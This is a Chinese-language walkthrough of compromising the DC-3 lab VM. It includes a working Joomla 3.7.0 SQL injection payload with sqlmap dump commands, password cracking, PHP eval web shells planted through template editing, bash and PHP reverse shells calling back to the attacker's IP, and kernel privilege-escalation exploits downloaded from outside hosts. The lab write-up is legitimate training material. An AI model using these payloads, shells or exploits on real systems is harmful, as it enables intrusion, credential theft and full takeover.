一.环境搭建
下载地址:
http://www.five86.com/downloads/DC-3-2.zip
下载不下来的可以用迅雷输入上面的网址进行下载
虚拟机配置:
切换连接桥接模式为nat模式,启动靶机,出现如下报错,进入虚拟机配置
data:image/s3,"s3://crabby-images/0b61b/0b61bfd12170a4e39917b0cc20f972210ec0ff12" alt=""
选中CD/DVD,点击右小角的高级选项,选择IDE 0:0,点击确定
data:image/s3,"s3://crabby-images/6ac25/6ac25301f0d6cc0211f52ba04042d4d6edc4010f" alt=""
启动虚拟机,如下图所示,启动成功
data:image/s3,"s3://crabby-images/f047d/f047dc8ddc9005dfd7467fb30bfe772759666b32" alt=""
二.开始渗透
1.信息收集
首先第一步,找到靶机的ip地址,输入以下命令
arp-scan -l
data:image/s3,"s3://crabby-images/0cbd3/0cbd3c3a287280e3c1531e78505c120b0edd7cd1" alt=""
可以看到靶机的ip地址为192.168.111.131,本机kali(攻击机)的ip地址为192.168.111.128
用nmap查看开放端口和服务
nmap -sV -p- 192.168.111.131
data:image/s3,"s3://crabby-images/40666/40666f940de2b8f56b94439dbf6240668f07c582" alt=""
开启了一个http服务,访问一下这个地址
data:image/s3,"s3://crabby-images/180df/180df693a8a7ec1d580e51f7a4c36ad6e9a26786" alt=""
得到提示(我感觉不是提示)
data:image/s3,"s3://crabby-images/a7c84/a7c84bff204c1fbb53ccc321837888b1feb76378" alt=""
用工具扫描一下这个是什么cms
whatweb -v http://192.168.111.131
data:image/s3,"s3://crabby-images/16722/16722d2c09ad623fb90e25442f880ba57e6ff242" alt=""
joomla cms,可以去网上查一下他的相关漏洞,根据其他大佬的文章,针对joomla有一个跟wpscan对wordpress一样的工具 ,叫做joomscan,下面的安装仅针对kali
apt-get install joomscan
joomscan --url http://192.168.111.131
data:image/s3,"s3://crabby-images/34171/341718fc6392d732277e4aae9a2b348744fe7d53" alt=""
得知他的目录信息,和版本号为3.7.0
利用searchsploit搜索相关漏洞
searchsploit joomla 3.7.0
data:image/s3,"s3://crabby-images/629fe/629fe58e6f34482d9e6dc9c80b778f7c37fed715" alt=""
2.漏洞利用
查看漏洞详情
他给出了sqlmap的命令,往下翻可以看到利用的payload
data:image/s3,"s3://crabby-images/23dac/23dac47c5eb7a86667ab52c6f9bca8b3b784aeaf" alt=""
http://192.168.111.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,database()),1)
我们进行测试,成功的话就可以放到sqlmap中自动化注入
data:image/s3,"s3://crabby-images/47275/47275d0784c9665505cd2df63dfadb75ce0ba2ad" alt=""
可以看到回显出了joomladb
使用sqlmap爆出库名(用网上这种一次次爆破的方式我的sqlmap会报错误)
用漏洞信息中自带的sqlmap进行操作(这玩意跑的是真的慢啊,我都想手测了)
sqlmap -u "http://192.168.111.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs
data:image/s3,"s3://crabby-images/e2c91/e2c9188e8ad742b0a514d46b6ed612054a4d3c21" alt=""
sqlmap -u "http://192.168.111.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --tables
读入如下表,直接__users
data:image/s3,"s3://crabby-images/6ab2a/6ab2ade01a85497cb5020e84beec54234ae6a23a" alt=""
sqlmap -u "http://192.168.111.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns
最终把结果dump下来
sqlmap -u "http://192.168.111.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C name,password --dump
3.密码破解
我们可以看到数据库中的账号以及加密后的密码,使用john对密码进行破解
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
创建文件
echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > test
爆破密码
john test
john test --show
data:image/s3,"s3://crabby-images/bf127/bf127791cc4d20d2bd9eb7b898bf987e68bf7d4c" alt=""
可以看到密码为snoopy
我们前面已经利用工具跑出了它的后台地址,用admin/snoopy进行后台登录
http://192.168.111.131/administrator/
data:image/s3,"s3://crabby-images/2a7ac/2a7ac4e20406576da29357c44774c665c17063f7" alt=""
登录成功
4.写入shell
在此处,可以通过模板向网站写入shell
data:image/s3,"s3://crabby-images/92c89/92c8941334d5471a80d90172b682c809a9aaa06a" alt=""
点击一个模板进入,点击新建文件(new file)
data:image/s3,"s3://crabby-images/4b016/4b01652cf5827c7cc48fecf332a76efe0eaab2ca" alt=""
<?php assert(@$_POST['a']); ?>
data:image/s3,"s3://crabby-images/82f27/82f27dfe62d1484b893a71863f4639a1e93b1d31" alt=""
http://192.168.111.131/templates/beez3/shell.php
上面那个shell不知道为什么连不上,换下面这个
<?php @eval($_POST['mlws']); ?>
data:image/s3,"s3://crabby-images/892ec/892ec869a80df3b9242c3f803a155ce1f549c966" alt=""
访问这个地址一片空白,用工具对shell进行连接
5.进行提权
进行linux内核提权
uname -a
cat /etc/issue
data:image/s3,"s3://crabby-images/fe8b4/fe8b4680bc88a0cb8f5503eacabb4c8aa389c2eb" alt=""
寻找内核提权脚本
searchsploit Ubuntu 16.04
data:image/s3,"s3://crabby-images/a0669/a0669286fde162e6e87ca289281111c1a34f381d" alt=""
searchsploit -p 39772
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
data:image/s3,"s3://crabby-images/f07c0/f07c0b4d7f33cded4688cceac6eea37db898c798" alt=""
在文件中可以找到漏洞利用的exp地址
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
这个地址已经失效了,根据我查找其他的wp得知以下地址可以下载
https://www.zacarx.com/a/aa/39772.zip
下载,解压,上传exploit.tar到目录下
data:image/s3,"s3://crabby-images/cae29/cae294e3686355659aa66eca8125125c547d72e1" alt=""
我直接物理机下载拖拽到kali中,通过蚁剑上传到目录下
tar -xf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
执行这个./compile.sh我这边会报错,但是不影响后面提权,最好还是操作一下(可能这个报错不影响编译)
反弹一个交互式的shell
创建一个phpshell.php文件,写入
<?php
system("$sock=fsockopen(\"192.168.111.128\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");");
?>
上面这个shell我在实践过程中无效
下面我提供一下自己生成的shell
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.111.128/4444 0>&1'");?>
在kali端起一个端口进行监听
nc -lvvp 4444
data:image/s3,"s3://crabby-images/7224d/7224d9ab888854b36a7059c09d7cb73bce94bd31" alt=""
在蚁剑端输入以下命令
php phpshell.php
data:image/s3,"s3://crabby-images/1464f/1464f80c185e384c454f32538f6912f1cce31c49" alt=""
成功反弹shell
执行刚刚上传的exp
./doubleput
data:image/s3,"s3://crabby-images/5261a/5261a9b95508dae7aa9d667b2b88791fbeb4e5ee" alt=""
成功提权为root(这个过程要等一段时间,他说等一分钟,等十几秒就好)
data:image/s3,"s3://crabby-images/a870a/a870aebea149896820fb048ce91e25c0282a07eb" alt=""
成功获得最终的flag
三.其他
1.提权阶段可以使用CVE-2021-4034漏洞进行提权
CVE-2021-4034漏洞exp
GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1day
利用脚本:https://www.zacarx.com/a/aa/CVE-2021-4034-main.zip
我们下载脚本
wget https://www.zacarx.com/a/aa/CVE-2021-4034-main.zip
一样上传到目录下,进行如下命令
unzip CVE-2021-4034-main.zip
cd CVE-2021-4034-main
make
./cve-2021-4034
data:image/s3,"s3://crabby-images/75c18/75c181872007262a4a2593f6208eb33e6ed7cd42" alt=""
但是我没试验成功,参考文章如下,感兴趣的师傅可以尝试一下,指出我操作的错误